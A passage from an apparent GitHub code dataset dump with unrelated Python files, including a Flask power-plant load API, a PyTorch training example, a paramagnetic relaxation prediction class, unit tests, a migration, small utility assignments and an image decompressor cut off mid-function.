gasfired or turbojet\r\n elif feature[j]['type'] == 'gasfired' or feature[j]['type'] == 'turbojet':\r\n p = feature[j]['pmax']\r\n #if the p is too hign it takes the value of the remaining load\r\n if p > load:\r\n p = load\r\n \r\n #if the p is too low it takes the value Pmin and it decreases the load of the previous plant\r\n elif p < feature[j]['pmin']:\r\n p_total[j-1]=p_total[j-1]-(feature[j]['pmin']-p)\r\n p = feature[j]['pmin']\r\n load = p\r\n \r\n #updating load \r\n load = load - p\r\n \r\n #adding corresponding p and name to the output\r\n name_total.append(feature[j]['name'])\r\n p_total.append(round(p,1))\r\n \r\n \r\n return(p_total,name_total)\r\n \r\n######################################################################################### \r\n#function that gives a json file as an output with the name and the corresponding load of each 
plant\r\ndef response(data):\r\n response={}\r\n (p,name)=load_attribution(data)\r\n for k in range (len(p)):\r\n response[k]={\r\n 'name': name[k],\r\n 'p': p[k]}\r\n #saving response as a json file\r\n with open('response.json', 'w') as mon_fichier:\r\n json.dump(response, mon_fichier)\r\n #reading the json file as an output\r\n with open('response.json') as f:\r\n final = json.loads(f.read())\r\n return(final)\r\n \r\n\r\n#########################################################################################\r\n#########################################################################################\r\n\r\n\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\n\r\n#API creation\r\n\r\nclass ProductionPlan(Resource):\r\n \r\n def post(self):\r\n #adding a file called name (eg of an URL: http://127.0.0.1:8888/productionplan?name=payload3.json)\r\n parser = reqparse.RequestParser()\r\n parser.add_argument('name', required=True)\r\n args = parser.parse_args()\r\n \r\n #creating a variable new_data which is the file given\r\n new_data=args.name\r\n \r\n with open(new_data) as f:\r\n data = json.loads(f.read())\r\n #running all the functions above\r\n output=response(data)\r\n return {'data': output}, 200 # return data and 200 OK code\r\n \r\n \r\napi.add_resource(ProductionPlan, '/productionplan') # '/productionplan' is our entry point\r\n\r\nif __name__ == '__main__':\r\n app.run(port=8888) # run our Flask app on the 8888 port\r\n ","repo_name":"eglantineboucher/Coding-challenge-ENGIE","sub_path":"coding_challenge_engie_Eglantine_Boucher.py","file_name":"coding_challenge_engie_Eglantine_Boucher.py","file_ext":"py","file_size_in_byte":5569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30033792415","text":"from api import app\nimport unittest\n\n\nclass FlaskTest(unittest.TestCase):\n def runTest_train(self):\n tester = app.test_client(self)\n response = tester.get(\"train\")\n status_code = response.status_code\n self.assertEqual(status_code, 200)\n print(\"test case 1 completed\")\n\n def runTest_prediction(self):\n tester = app.test_client(self)\n response = tester.get(\"/prediction/\")\n status_code = response.status_code\n self.assertEqual(status_code, 308)\n print(\"test case 2 completed\")\n\n\nif __name__ == \"__main__\":\n tester = FlaskTest()\n tester.runTest_train()\n tester.runTest_prediction()\n","repo_name":"SARIKAYA77/case","sub_path":"etiya/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73287254595","text":"from functionrefactor.parser import Parser\nfrom tests.common_functions import *\n\n\ndef test_namespace():\n ''' ignores_new lines '''\n _in = [\n \"namespace Nutella\", \"{\", \"}\", \"namespace PeanutButter{\", \"}\",\n \"namespace Cereal{ //something\", \"}\"\n ]\n\n expected_result_hpp = [\n \"namespace Nutella {}// namespace Nutella\",\n \"namespace PeanutButter {}// namespace PeanutButter\",\n \"namespace Cereal {//something}// namespace Cereal\"\n ]\n expected_result_cpp = [\n \"namespace Nutella {}// namespace Nutella\",\n \"namespace PeanutButter {}// namespace PeanutButter\",\n \"namespace Cereal {}// namespace Cereal\"\n ]\n\n parser = Parser()\n parse_batch_run(_in, expected_result_hpp, expected_result_cpp,\n lambda i, txt, h: parser._parse_namespace_block(i, txt, h))\n\n\ndef test_class():\n ''' ignores_new lines '''\n _in = [\n \"class Nutella\", \"{\", \"};\", 
\"class PeanutButter{\", \"};\",\n \"class PeanutButter{//something\", \"};\"\n ]\n\n expected_result_hpp = [\n \"class Nutella {}; \", \"class PeanutButter {}; \",\n \"class PeanutButter {//something}; \"\n ]\n\n expected_result_cpp = [\"\", \"\", \"\"]\n\n parser = Parser()\n parse_batch_run(_in, expected_result_hpp, expected_result_cpp,\n lambda i, txt, h: parser._parse_class_block(i, txt, h))\n","repo_name":"astrodroid/functionrefactor","sub_path":"tests/test_namespace_class.py","file_name":"test_namespace_class.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24964963476","text":"# -*- coding: utf-8 -*-\n\"\"\"\nImplementation of a neural network using PyTorch.\nCreated on Tue Mar 26 14:00:00 2019\nAuthor: Prasun Roy | CVPRU-ISICAL (http://www.isical.ac.in/~cvpr)\nGitHub: https://github.com/prasunroy/pytorch-bootcamp\n\nReferences:\n[1] https://pytorch.org/tutorials/beginner/pytorch_with_examples.html\n\n\"\"\"\n\n\n# imports\nimport torch\nimport time\n\n\nt0 = time.time()\n\n# Set random number generator seed for reproducibility.\ntorch.manual_seed(0)\n\n# Set device.\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n# N is batch size; D_in is input dimension;\n# H is hidden dimension; D_out is output dimension.\nN, D_in, H, D_out = 25, 100, 50, 10\n\n# Create random input and output data.\nx = torch.randn(N, D_in, dtype=torch.float, device=device)\ny = torch.randn(N, D_out, dtype=torch.float, device=device)\n\n# Randomly initialize weights.\nw1 = torch.randn(D_in, H, dtype=torch.float, device=device)\nw2 = torch.randn(H, D_out, dtype=torch.float, device=device)\n\n# Set learning rate.\nlearning_rate = 1e-6\n\n# Train neural network.\nfor epoch in range(1000):\n # Forward pass: compute predicted y\n h = x.mm(w1)\n h_relu = h.clamp(min=0)\n y_pred = h_relu.mm(w2)\n \n # Compute loss.\n loss = (y_pred - y).pow(2).sum().item()\n print(f'[PyTorch_{device.type.upper()}] Epoch {epoch+1:4d} | Loss {loss:.4f}')\n \n # Backprop to compute gradients of loss with respect to w1 and w2.\n grad_y_pred = 2.0 * (y_pred - y)\n grad_w2 = h_relu.t().mm(grad_y_pred)\n grad_h_relu = grad_y_pred.mm(w2.t())\n grad_h = grad_h_relu.clone()\n grad_h[h < 0] = 0\n grad_w1 = x.t().mm(grad_h)\n \n # Update weights.\n w1 -= learning_rate * grad_w1\n w2 -= learning_rate * grad_w2\n\nt1 = time.time()\n\nprint(f'\\nTotal execution time: {t1-t0:.2f} seconds')\n","repo_name":"prasunroy/pytorch-bootcamp","sub_path":"nn_torch_v1.py","file_name":"nn_torch_v1.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38015980053","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPRE prediction Class\n--------------------\n\nClass to perform Paramagnetic Relaxation Enhancement prediction, employing the Model-Free Solomon-Bloembergen equation.\n\n\"\"\"\n\nimport os\nimport numpy as np\nimport MDAnalysis\nfrom MDAnalysis.coordinates.memory import MemoryReader\nimport pandas as pd\nimport logging\nfrom DEERPREdict.utils import Operations\n\nclass PREpredict(Operations):\n \"\"\"Calculation of the distance profile between a probe and backbone amide.\"\"\"\n\n def __init__(self, protein, residue, **kwargs):\n \"\"\"\n Args:\n protein (:py:class:`MDAnalysis.core.universe.Universe`): trajectory\n residue (int): residue labeled with the paramagnetic probe\n \"\"\"\n Operations.__init__(self, protein, **kwargs)\n 
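        # Note: the selections built below restrict the PRE read-out to backbone amide
        # positions (atom N by default), excluding the labeled residue itself, residue 1
        # and prolines, which lack an amide proton; segids narrow this to given chains.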
self.residue = residue\n # Class specific instance attributes\n logging.basicConfig(filename=kwargs.get('log_file', 'log'),level=logging.INFO)\n\n residue_sel = \"resid {:d}\".format(self.residue)\n if type(self.chains[0]) == str:\n residue_sel += \" and segid {:s}\".format(self.chains[0])\n logging.info('{:s} = {:s}'.format(residue_sel,self.protein.select_atoms(residue_sel).atoms.resnames[0]))\n\n # Approximate electron position at Cbeta\n self.Cbeta = kwargs.get('Cbeta', False)\n self.atom_selection = kwargs.get('atom_selection', 'N')\n self.resnums = np.array(protein.select_atoms('name N and protein').resnums)\n self.measured_sel = 'name {:s} and not resid {:d} and not resid 1 and not resname PRO'.format(self.atom_selection, residue)\n if type(self.chains[0]) == str:\n self.measured_sel = 'name {:s} and not (resid {:d} and segid {:s}) and not resid 1 and not resname PRO'.format(self.atom_selection, residue, self.chains[0])\n if type(self.chains[1]) == str:\n self.resnums = np.array(protein.select_atoms('name N and protein and segid {:s}'.format(self.chains[1])).resnums)\n self.measured_sel += ' and segid {:s}'.format(self.chains[1])\n self.measured_resnums = np.array(protein.select_atoms(self.measured_sel).resnums)\n _, self.measured_resnums, _ = np.intersect1d(self.resnums,self.measured_resnums,return_indices=True)\n\n def trajectoryAnalysis(self):\n logging.info(\"Starting rotamer distance analysis of trajectory {:s} \"\n \"with labeled residue {:d}\".format(self.protein.trajectory.filename,self.residue))\n # Create arrays to store per-frame inverse distances, angular order parameter, and relaxation rate\n r3 = np.full((self.protein.trajectory.n_frames, self.measured_resnums.size), np.nan)\n r6 = np.full(r3.shape, np.nan)\n angular = np.full(r3.shape, np.nan)\n zarray = np.empty(0) # Array of steric partition functions (sum over Boltzmann weights)\n # Before getting into this loop, which consumes most of the calculations time\n # we can pre-calculate several objects that do not vary along the loop\n universe, prot_atoms, LJ_data = self.precalculate_rotamer(self.residue, self.chains[0])\n for frame_ndx, _ in enumerate(self.protein.trajectory):\n # Fit the rotamers onto the protein\n rotamersSite = self.rotamer_placement(universe, prot_atoms)\n # Calculate Boltzmann weights\n boltz, z = self.rotamerWeights(rotamersSite, LJ_data)\n # Skip this frame if the sum of the Boltzmann weights is smaller than the cutoff value\n zarray = np.append(zarray,z)\n if z <= self.z_cutoff:\n # Store the radius of gyration of tight frames\n continue\n # Calculate interaction distances and squared angular components of the order parameter\n r3[frame_ndx], r6[frame_ndx], angular[frame_ndx] = self.rotamerPREanalysis(rotamersSite, boltz)\n # Saving analysis as a pickle file\n data = pd.Series({'r3':r3.astype(np.float32), 'r6':r6.astype(np.float32), 'angular':angular.astype(np.float32)})\n data.to_pickle(self.output_prefix+'-{:d}.pkl'.format(self.residue),compression='gzip')\n np.savetxt(self.output_prefix+'-Z-{:d}.dat'.format(self.residue),zarray)\n # logging.info('Calculated distances and order parameters are saved to {}.'.format(self.output_prefix+'-{:d}.pkl'.format(residue)))\n return data\n\n def trajectoryAnalysisCbeta(self):\n # Create arrays to store per-frame inverse distances, angular order parameter, and relaxation rate\n r3 = np.full((self.protein.trajectory.n_frames, self.measured_resnums.size), np.nan)\n r6 = np.full(r3.shape, np.nan)\n angular = np.full(r3.shape, np.nan)\n residue_sel = \"resid 
{:d}\".format(self.residue)\n if type(self.chains[0]) == str:\n residue_sel += \" and segid {:s}\".format(self.chains[0])\n for frame_ndx, _ in enumerate(self.protein.trajectory):\n # Positions of the Cbeta atom of the spin-labeled residue\n spin_labeled_Cbeta = self.protein.select_atoms(\"protein and name CB and \"+residue_sel).positions\n # Positions of the backbone nitrogen atoms\n amide_pos = self.protein.select_atoms(self.measured_sel).positions\n # Distances between nitroxide and amide groups\n dists_array_r = np.linalg.norm(spin_labeled_Cbeta - amide_pos,axis=1)\n r6[frame_ndx] = np.power(dists_array_r,-6)\n #dists_array_r = mda_dist.distance_array(spin_labeled_Cbeta,amide_nit_pos,backend='OpenMP')\n # Saving analysis as a pickle file\n data = pd.Series({'r3':r3.astype(np.float32), 'r6':r6.astype(np.float32), 'angular':angular.astype(np.float32)})\n data.to_pickle(self.output_prefix+'-{:d}.pkl'.format(self.residue),compression='gzip')\n # logging.info('Calculated distances and order parameters are saved to {}.'.format(self.output_prefix+'-{:d}.pkl'.format(residue)))\n return data\n\n def save(self, data):\n if isinstance(self.weights, np.ndarray):\n if self.weights.size != data['r6'].shape[0]:\n logging.info('Weights array has size {} whereas the number of frames is {}'.\n format(self.weights.size, data['r6'].shape[0]))\n raise ValueError('Weights array has size {} whereas the number of frames is {}'.\n format(self.weights.size, data['r6'].shape[0]))\n elif self.weights == False:\n self.weights = np.ones(data['r6'].shape[0])\n else:\n logging.info('Weights argument should be a numpy array')\n raise ValueError('Weights argument should be a numpy array')\n # Transverse relaxation rate enhancement due to the presence of the unpaired electron\n gamma_2_av = np.full(self.resnums.size, fill_value=np.NaN)\n if (self.Cbeta):\n gamma_2 = self.calc_gamma_2_Cbeta(data['r6'], self.tau_c, self.wh, self.k)\n else:\n s_pre = np.power(data['r3'], 2)/data['r6']*data['angular']\n gamma_2 = self.calc_gamma_2(data['r6'], s_pre, self.tau_c, self.tau_t, self.wh, self.k)\n # Weighted average of gamma_2 over the conformational ensemble\n gamma_2 = np.ma.MaskedArray(gamma_2, mask=np.isnan(gamma_2))\n gamma_2_av[self.measured_resnums] = np.ma.average(gamma_2, weights=self.weights, axis=0).data\n # Paramagnetic / diamagnetic intensity ratio\n i_ratio = self.r_2 * np.exp(-gamma_2_av * self.delay) / ( self.r_2 + gamma_2_av )\n np.savetxt(self.output_prefix+'-{}.dat'.format(self.residue),np.c_[self.resnums,i_ratio,gamma_2_av],header='residue i_ratio gamma_2')\n\n def run(self, **kwargs):\n self.tau_c = kwargs.get('tau_c', 1.0e-9) # rotational tumbling time\n self.tau_t = kwargs.get('tau_t', 5.0e-10) # internal correlation time \n self.wh = kwargs.get('wh', 700.0) # proton Larmor frequency / (2 pi 1e6)\n self.k = kwargs.get('k', 1.23e16) \n self.delay = kwargs.get('delay', 10.0e-3) # INEPT delay\n # Diamagnetic transverse relaxation rate\n self.r_2 = np.full(self.resnums.size, fill_value=np.NaN) # transverse relaxation rate\n self.r_2[self.measured_resnums] = kwargs.get('r_2', 10.0) # in the diamagnetic molecule\n # Output\n self.output_prefix = kwargs.get('output_prefix', 'res')\n # Input\n self.load_file = kwargs.get('load_file', False)\n # Weights for each frame\n self.weights = kwargs.get('weights', False)\n if self.load_file:\n if os.path.isfile(self.load_file):\n logging.info('Loading pre-computed data from {} - will not load trajectory file.'.format(self.load_file))\n else:\n logging.info('File {} not 
found!'.format(self.load_file))\n raise FileNotFoundError('File {} not found!'.format(self.load_file))\n data = pd.read_pickle(self.load_file,compression='gzip')\n else:\n if self.Cbeta:\n data = self.trajectoryAnalysisCbeta()\n else:\n data = self.trajectoryAnalysis()\n self.save(data)\n","repo_name":"KULL-Centre/DEERpredict","sub_path":"DEERPREdict/PRE.py","file_name":"PRE.py","file_ext":"py","file_size_in_byte":9144,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"19244963677","text":"__author__ = 'Dmitry Patashov'\r\n\r\nimport numpy as np\r\nimport numbers\r\nimport operator\r\nimport os\r\n\r\n# Assignment 1:\r\ndef myList2Text(myList):\r\n\r\n if myList.__class__ != [].__class__:\r\n return None\r\n\r\n myStr = ''\r\n for k in range(len(myList)):\r\n myStr += str(myList[k])\r\n\r\n return myStr\r\n\r\n# Assignment 2:\r\ndef myListMean(myList):\r\n\r\n if myList.__class__ != [].__class__:\r\n return None\r\n\r\n MyL = enumerate(myList)\r\n subL = list()\r\n subLind = list()\r\n for Instance in MyL:\r\n x = Instance[1]\r\n tst = isinstance(x, numbers.Number)\r\n if tst:\r\n subL.append(Instance[1])\r\n subLind.append(Instance[0])\r\n\r\n meanVal = np.float64(sum(subL)) / np.float64(len(subL))\r\n Dist = np.absolute(meanVal - subL)\r\n Location = subLind[min(enumerate(Dist), key=operator.itemgetter(1))[0]]\r\n\r\n print ('Mean Value =', meanVal, 'Location =', Location)\r\n\r\n# Assignment 3:\r\ndef list_files(directory=None):\r\n\r\n if directory == None:\r\n directory = os.getcwd()\r\n\r\n if os.path.exists(directory) == False:\r\n directory = os.getcwd()\r\n print ('Error: Directory does not exist!')\r\n\r\n return [x for x in os.listdir(directory) if os.path.isfile(os.path.join(directory, x))]\r\n\r\n# Assignment 4:\r\ndef create_3darray(myTuple):\r\n\r\n if myTuple.__class__ != tuple('0').__class__:\r\n return None\r\n\r\n return np.zeros(myTuple)\r\n\r\n# Assignment 5:\r\ndef myRot13(myText):\r\n\r\n if myText.__class__ != ''.__class__:\r\n return None\r\n\r\n key = {'a': 'n', 'b': 'o', 'c': 'p', 'd': 'q', 'e': 'r', 'f': 's', 'g': 't', 'h': 'u',\r\n 'i': 'v', 'j': 'w', 'k': 'x', 'l': 'y', 'm': 'z', 'n': 'a', 'o': 'b', 'p': 'c',\r\n 'q': 'd', 'r': 'e', 's': 'f', 't': 'g', 'u': 'h', 'v': 'i', 'w': 'j', 'x': 'k',\r\n 'y': 'l', 'z': 'm', 'A': 'N', 'B': 'O', 'C': 'P', 'D': 'Q', 'E': 'R', 'F': 'S',\r\n 'G': 'T', 'H': 'U', 'I': 'V', 'J': 'W', 'K': 'X', 'L': 'Y', 'M': 'Z', 'N': 'A',\r\n 'O': 'B', 'P': 'C', 'Q': 'D', 'R': 'E', 'S': 'F', 'T': 'G', 'U': 'H', 'V': 'I',\r\n 'W': 'J', 'X': 'K', 'Y': 'L', 'Z': 'M'}\r\n\r\n result = ''\r\n for x in myText:\r\n if ord(x) >= ord('a') and ord(x) <= ord('z') or ord(x) >= ord('A') and ord(x) <= ord('Z'):\r\n result += key[x]\r\n else:\r\n result += x\r\n return result\r\n\r\n# Assignment 6:\r\ndef countMyWords(myStr):\r\n\r\n if myStr.__class__ != ''.__class__:\r\n return None\r\n\r\n Dist = ord('A') - ord('a')\r\n myList = list(myStr)\r\n for k in range(len(myStr)):\r\n if ord(myStr[k]) >= ord('A') and ord(myStr[k]) <= ord('Z'):\r\n myList[k] = chr(ord(myStr[k]) - Dist)\r\n\r\n newStr = \"\".join(myList)\r\n tmpList = newStr.split()\r\n\r\n ResD = {}\r\n while len(tmpList):\r\n ResD[tmpList[0]] = tmpList.count(tmpList[0])\r\n tmpList = list(filter(lambda a: a != tmpList[0], tmpList))\r\n\r\n print (\"{:<20} {}\".format('Word', 'Occurrences'))\r\n for myKey, myLabel in ResD.items():\r\n print (\"{:<20} {}\".format(myKey, myLabel))\r\n\r\n# Assignment 7:\r\ndef robot_dist(up, down, left, 
right):\r\n\r\n xcount = 0\r\n if up.__class__ != xcount.__class__ or \\\r\n down.__class__ != xcount.__class__ or \\\r\n left.__class__ != xcount.__class__ or \\\r\n right.__class__ != xcount.__class__:\r\n\r\n return None\r\n\r\n ycount = up - down\r\n xcount = right - left\r\n\r\n Distance = (ycount ** 2 + xcount ** 2) ** 0.5\r\n Angle = np.arctan2(ycount, xcount)\r\n\r\n return Distance, Angle\r\n\r\n","repo_name":"haimadrian/AlgorithmsInMultimediaUsingPython","sub_path":"All_Sols/CW/ClassWork2Sol35/FunctionList.py","file_name":"FunctionList.py","file_ext":"py","file_size_in_byte":3532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14632765061","text":"from OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLE import *\nfrom math import *\nfrom od_utils import *\n\n\nclass od_shape:\n def __init__(self, name=None):\n self.id = glGenLists(1)\n self._name = name\n\n def draw(self):\n if glIsList(self.id):\n glCallList(self.id)\n\n def __del__(self):\n if glIsList(self.id):\n glDeleteLists(self.id, 1)\n\n def name(self):\n return self._name;\n \nclass od_cylinder(od_shape):\n def __init__(self, rad, top, height, name= \"cylinder\", slices=10, stacks=2):\n od_shape.__init__(self, name)\n x=[]\n y=[]\n self.rad = rad\n self.top = top\n self.height = height\n half_h = height/2.0\n glNewList(self.id, GL_COMPILE)\n for i in range(slices):\n theta = 2.0*pi/slices*i\n c = rad*cos(theta)\n s = rad*sin(theta)\n x.append(c)\n y.append(s)\n glBegin(GL_LINE_LOOP)\n for i in range(slices):\n glVertex3f(x[i], y[i], half_h)\n glEnd()\n glBegin(GL_LINE_LOOP)\n for i in range(slices):\n glVertex3f(x[i], y[i], -half_h)\n glEnd()\n glBegin(GL_LINES)\n for i in range(slices):\n glVertex3f(x[i], y[i], -half_h)\n glVertex3f(x[i], y[i], half_h)\n glEnd()\n glEndList()\n\n def save(self, n, temp):\n att=[]\n att = toxml_block(n+1, \"type\", [self.name()], att)\n att = toxml_block(n+1, \"dims\", [str(self.rad)+' '+str(self.top)+' '+str(self.height)], att)\n temp = toxml_block(n, \"shape\", att, temp)\n return temp\n \nclass od_box(od_shape):\n def __init__(self, l, w, h, name=\"box\"):\n od_shape.__init__(self, name)\n self.l = l\n self.w = w\n self.h = h\n glNewList(self.id, GL_COMPILE)\n glTranslatef(-l/2.0, -w/2.0, -h/2.0) \n glBegin(GL_LINE_LOOP)\n glVertex3f(0.0, 0.0, 0.0)\n glVertex3f(l, 0.0, 0.0)\n glVertex3f(l, w, 0.0)\n glVertex3f(0.0, w, 0.0)\n glEnd()\n glBegin(GL_LINE_LOOP)\n glVertex3f(0.0, 0.0, h)\n glVertex3f(l, 0.0, h)\n glVertex3f(l, w, h)\n glVertex3f(0.0, w, h)\n glEnd()\n glBegin(GL_LINE_LOOP)\n glVertex3f(0.0, 0.0, 0.0)\n glVertex3f(0.0, 0.0, h)\n glVertex3f(l, 0.0, 0.0)\n glVertex3f(l, 0.0, h)\n glEnd()\n glBegin(GL_LINE_LOOP)\n glVertex3f(l, w, 0.0)\n glVertex3f(l, w, h)\n glVertex3f(0.0, w, 0.0)\n glVertex3f(0.0, w, h)\n glEnd()\n glEndList()\n\n def save(self, n, temp):\n att=[]\n att = toxml_block(n+1, \"type\", [self.name()], att)\n att = toxml_block(n+1, \"dims\", [str(self.l)+' '+str(self.w)+' '+str(self.h)], att)\n temp = toxml_block(n, \"shape\", att, temp)\n return temp\n\nclass od_link(od_shape):\n def __init__(self, l, w, h, name=\"link\"):\n od_shape.__init__(self, name)\n self.l = l\n self.w = w\n self.h = h\n h_l = l/2.0\n h_w = w/2.0\n h_h = h/2.0\n arc_pnts_f=[]\n arc_pnts_b=[]\n low_pnts=[[0.0, 0.0, 0.0], [l, 0.0, 0.0], [l, w, 0.0], [0.0, w, 0.0]]\n up_pnts=[[0.0, 0.0, h], [l, 0.0, h], [l, w, h], [0.0, w, h]]\n for i in range(11):\n angle=pi*float(i)/10.0\n #print cos(angle)\n 
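            # angle sweeps 0..pi over the 11 samples, so (c, s) below trace a semicircle
            # of radius l/2; shifted by h_l along x, these points form the rounded caps
            # of the link, drawn later at z = -s (bottom) and z = h + s (top).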
c = cos(angle)*h_l\n s = sin(angle)*h_l\n arc_pnts_b.append([c+h_l, 0, s])\n arc_pnts_f.append([c+h_l, w, s])\n glNewList(self.id, GL_COMPILE)\n glTranslatef(-l/2.0, -w/2.0, -h/2.0) \n #draw 4 lines\n glBegin(GL_LINES)\n for i in range(4):\n glVertex3f(low_pnts[i][0], low_pnts[i][1], low_pnts[i][2])\n glVertex3f(up_pnts[i][0], up_pnts[i][1], up_pnts[i][2])\n glEnd()\n #####################################\n glBegin(GL_LINE_STRIP)\n for i in range(11):\n glVertex3f(arc_pnts_b[i][0], arc_pnts_b[i][1], -arc_pnts_b[i][2])\n glEnd()\n glBegin(GL_LINE_STRIP)\n for i in range(11):\n glVertex3f(arc_pnts_f[i][0], arc_pnts_f[i][1], -arc_pnts_f[i][2])\n glEnd()\n glBegin(GL_LINES)\n for i in range(11):\n glVertex3f(arc_pnts_b[i][0], arc_pnts_b[i][1], -arc_pnts_b[i][2])\n glVertex3f(arc_pnts_f[i][0], arc_pnts_f[i][1], -arc_pnts_f[i][2])\n glEnd()\n ########################################\n glBegin(GL_LINE_STRIP)\n for i in range(11):\n glVertex3f(arc_pnts_b[i][0], arc_pnts_b[i][1], h+arc_pnts_b[i][2])\n glEnd()\n glBegin(GL_LINE_STRIP)\n for i in range(11):\n glVertex3f(arc_pnts_f[i][0], arc_pnts_f[i][1], h+arc_pnts_f[i][2])\n glEnd()\n glBegin(GL_LINES)\n for i in range(11):\n glVertex3f(arc_pnts_b[i][0], arc_pnts_b[i][1], h+arc_pnts_b[i][2])\n glVertex3f(arc_pnts_f[i][0], arc_pnts_f[i][1], h+arc_pnts_f[i][2])\n glEnd()\n glEndList()\n\n def save(self, n, temp):\n att=[]\n att = toxml_block(n+1, \"type\", [self.name()], att)\n att = toxml_block(n+1, \"dims\", [str(self.l)+' '+str(self.w)+' '+str(self.h)], att)\n temp = toxml_block(n, \"shape\", att, temp)\n return temp\n","repo_name":"utbeaver/obdyn_old","sub_path":"src/gui/od_geom.py","file_name":"od_geom.py","file_ext":"py","file_size_in_byte":5334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27689500518","text":"\"\"\"added archived\n\nRevision ID: 12dc43217690\nRevises: 16901867d1f2\nCreate Date: 2019-12-01 19:33:21.556938\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '12dc43217690'\ndown_revision = '16901867d1f2'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('event', sa.Column('archived', sa.String(length=10), nullable=True))\n op.create_index(op.f('ix_event_archived'), 'event', ['archived'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_index(op.f('ix_event_archived'), table_name='event')\n op.drop_column('event', 'archived')\n # ### end Alembic commands ###\n","repo_name":"Angelozinna96/CC_project","sub_path":"migrations/versions/12dc43217690_added_archived.py","file_name":"12dc43217690_added_archived.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15558746453","text":"import random\nimport numpy as np\n\ndef gen_matix():\n rows = int(input())\n cols = int(input())\n matr = list()\n\n print(f\"{rows} {cols}\")\n\n for _ in range(cols):\n row = list()\n for _ in range(rows):\n num = random.randint(1,5)\n print(num, end=\" \")\n row.append(num)\n matr.append(row)\n #\n print()\n #\n return matr\n\ndef dump(matr):\n shape = matr.shape\n print(f\"{shape[0]} {shape[1]}\")\n for row_it in range(shape[0]):\n for col_it in range(shape[1]):\n print(matr[row_it][col_it], end=\" \")\n #\n print()\n\ndef main():\n matr1 = gen_matix()\n print()\n matr2 = gen_matix()\n \n matr1 = np.array(matr1)\n matr2 = np.array(matr2)\n\n res = np.dot(matr1, matr2)\n\n print()\n dump(res)\n\nif __name__ == '__main__':\n main()","repo_name":"uslsteen/parallel_prog","sub_path":"include/matrix/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"19646002331","text":"##############################################################################\n#\n# This file is part of JA2 Open Toolset\n#\n# JA2 Open Toolset is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# JA2 Open Toolset is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with JA2 Open Toolset. 
If not, see <http://www.gnu.org/licenses/>.\n#\n##############################################################################\n\nimport io\nimport struct\n\nALPHA_VALUE = 0\nIS_COMPRESSED_BYTE_MASK = 0x80\nNUMBER_OF_BYTES_MASK = 0x7F\n\n\nclass EtrleException(Exception):\n    \"\"\"Raised when an error in compression or decompression occurs\"\"\"\n    pass\n\n\ndef etrle_decompress(data):\n    number_of_compressed_bytes = len(data)\n    compressed_bytes = struct.unpack('<{}B'.format(number_of_compressed_bytes), data)\n    extracted_buffer = io.BytesIO()\n    bytes_til_next_control_byte = 0\n\n    for current_byte in compressed_bytes:\n        if bytes_til_next_control_byte == 0:\n            is_compressed_alpha_byte = ((current_byte & IS_COMPRESSED_BYTE_MASK) >> 7) == 1\n            length_of_subsequence = current_byte & NUMBER_OF_BYTES_MASK\n            if is_compressed_alpha_byte:\n                for s in range(length_of_subsequence):\n                    extracted_buffer.write(struct.pack('
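# A minimal, self-contained sketch of the run-length scheme implied by the masks
# above (an assumption drawn from the constants, not taken from the original file):
# a control byte with bit 7 set (IS_COMPRESSED_BYTE_MASK) encodes a transparent run
# expanded to ALPHA_VALUE bytes, while the low 7 bits (NUMBER_OF_BYTES_MASK)
# otherwise count literal bytes to copy verbatim.
def etrle_decompress_sketch(data: bytes) -> bytes:
    out = bytearray()
    i = 0
    while i < len(data):
        control = data[i]
        i += 1
        run_length = control & NUMBER_OF_BYTES_MASK
        if control & IS_COMPRESSED_BYTE_MASK:
            out.extend(bytes([ALPHA_VALUE]) * run_length)   # transparent run
        else:
            out.extend(data[i:i + run_length])              # literal bytes
            i += run_length
    return bytes(out)

# e.g. bytes([0x83]) expands to three ALPHA_VALUE bytes, while bytes([0x02]) + b'AB'
# copies the two literals 'A' and 'B'.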
